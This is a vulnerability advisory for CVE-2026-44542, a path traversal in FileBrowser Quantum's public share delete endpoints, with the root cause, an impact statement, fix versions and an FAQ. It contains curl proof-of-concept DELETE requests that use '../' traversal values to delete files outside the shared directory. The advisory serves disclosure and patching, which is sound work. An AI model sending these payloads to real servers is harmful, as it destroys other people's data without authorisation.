CVE-2026-44542: FileBrowser Quantum: Unauthenticated Path Traversal in Public Share Delete Allows Arbitrary File Deletion
Summary
Attacker-controlled path input is joined with a trusted base path prior to sanitization, allowing traversal sequences (e.g., ../) to escape the intended shared directory. As a result, an unauthenticated attacker possessing a valid public share hash with delete permissions enabled can delete arbitrary files outside the shared directory within the share owner’s configured storage scope.
Affected Components
Two distinct vulnerable code paths:
1. Stable versions (e.g., gtstef/filebrowser:stable) DELETE /public/api/resources?hash=<hash>&path=../victim Root cause: middleware.go:111 Issue: path query parameter is joined before SanitizeUserPath() 2. Development / HEAD (e.g., commit eabdfd9) DELETE /public/api/resources/bulk?hash=<hash> Body: [{"path":"../victim"}] Root cause: resource.go:274 Issue: item.Path is joined before SanitizeUserPath()
Steps to reproduce (Stable Version)
1. Create a directory structure:
/folder/sharedsubdir/ (shared) /folder/protected.txt (outside shared directory)
2. Create a public share: Path: /sharedsubdir AllowDelete=true
3. Send request:
curl -X DELETE "http://localhost/public/api/resources?hash=<HASH>&path=../protected.txt"
#Observe: #protected.txt is deleted despite being outside the shared directory
Proof of Concept (HEAD / bulk endpoint)
curl -X DELETE "http://localhost/public/api/resources/bulk?hash=<HASH>" \ -H "Content-Type: application/json" \ -d '[{"path":"../protected.txt"}]'
Alternative PoC Scripts: pocv3.sh (If the script fails due to environment differences, the manual PoC above reliably reproduces the issue.)
Impact An unauthenticated attacker with access to a public share link configured with delete permissions enabled can delete attacker-chosen files outside the shared directory, anywhere within the share owner’s storage scope. This results in unauthorized data loss and potential service disruption.
Other sources
FileBrowser Quantum is a free, self-hosted, web-based file manager. Prior to 1.3.1-stable and 1.3.9-beta, attacker-controlled path input is joined with a trusted base path prior to sanitization, allowing traversal sequences (e.g., ../) to escape the intended shared directory. As a result, an unauthenticated attacker possessing a valid public share hash with delete permissions enabled can delete arbitrary files outside the shared directory within the share owner’s configured storage scope. This affects public/api/resources and public/api/resources/bulk. This vulnerability is fixed in 1.3.1-stable and 1.3.9-beta.
— MITRE
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2026-44542?
CVE-2026-44542 is considered a high severity vulnerability due to its potential for unauthorized access and data manipulation.
How do I fix CVE-2026-44542?
To fix CVE-2026-44542, ensure you update to the latest version of the software, specifically remedy version 0.0.0-20260501183844-112740bdd41d.
Who is affected by CVE-2026-44542?
CVE-2026-44542 affects users of the 'github.com/gtsteffaniak/filebrowser' package prior to the specified remedy version.
What type of attack does CVE-2026-44542 facilitate?
CVE-2026-44542 facilitates path traversal attacks that could allow attackers to escape the intended directory and access or delete files.
Is authentication required to exploit CVE-2026-44542?
No, CVE-2026-44542 can be exploited by unauthenticated attackers with a valid public share hash that has delete permissions.